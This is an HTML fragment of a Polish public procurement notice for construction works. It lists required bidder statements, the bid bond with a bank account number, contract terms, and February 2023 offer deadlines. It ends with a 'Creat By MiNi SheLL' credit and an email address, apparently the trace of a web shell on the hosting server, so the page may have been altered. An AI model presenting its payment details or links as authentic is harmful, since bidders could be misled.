zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca jest zobowiązany złożyć wraz z ofertą następujące oświadczenia <br/>i dokumenty: <br/>1.1 oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania, sporządzone zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ,<br/>	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie składa każdy z wykonawców,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone zgodnie z wzorem stanowiącym załącznik nr 6 do SWZ,<br/>	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu, <br/>	w przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostepniających zasoby, należy złożyć ponadto oświadczenie podmiotu udostępniającego zasoby o spełnianiu warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/><br/>Wykonawca, którego oferta została najwyżej oceniona, jest zobowiązany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania zamawiającego, aktualnych na dzień składania następujących oświadczeń lub dokumentów: <br/>1)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; sporządzonego zgodnie z wzorem stanowiącym załącznik nr 8 do SWZ,<br/>2)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; <br/>3)	sporządzonego zgodnie z wzorem stanowiącym załącznik nr 9 do SWZ - jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył,<br/>4)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; sporządzonego zgodnie z wzorem stanowiącym załącznik nr 10 do SWZ.<br/><br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w niniejszym rozdziale, składa się w formie elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1	oświadczenie, z którego wynika, które roboty budowalne wykonają poszczególni wykonawcy, określające zakres jaki wykona każdy z wykonawców wspólnie ubiegających się o zamówienie, sporządzone zgodnie z wzorem stanowiącym załącznik nr 7 do SWZ – oświadczenie składa pełnomocnik w imieniu wszystkich wykonawców wspólnie ubiegających się o zamówienie,<br/>2.pełnomocnictwo do reprezentowania wykonawcy wspólnie ubiegającego się o zamówienie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Wraz z ofertą należy złożyć dowód wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga złożenia wadium w wysokości 1 500,00 (jeden tysiąc pięćset) złotych.<br/><br/><br/>2.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>a)	pieniądzu na rachunek Zamawiającego w;<br/> Banku Spółdzielczym w Krokowej<br/> 42 8349 0002 0030 3260 2000 0010<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości <br/>przy czym, gdy wadium wnoszone w sposób określony w pkt. 2-4 powyżej, wykonawca zobowiązany jest przekazać zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej zgodnie z wymogami określonymi w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawca jest zobowiązany złożyć wraz z ofertą oświadczenia i dokumenty:<br/><br/>1. oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania, sporządzone zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ,<br/>2. oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone zgodnie z wzorem stanowiącym załącznik nr 6 do SWZ,<br/>3.pełnomocnictwo do reprezentowania wykonawcy wspólnie ubiegającego się o zamówienie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4. oświadczenie, z którego wynika, które roboty budowalne wykonają poszczególni wykonawcy, określające zakres jaki wykona każdy z wykonawców wspólnie ubiegających się o zamówienie, sporządzone zgodnie z wzorem stanowiącym załącznik nr 7 do SWZ – oświadczenie składa pełnomocnik w imieniu wszystkich wykonawców wspólnie ubiegających się o zamówienie, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany w umowie określone są w załączniku nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://sws-swarzewo.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com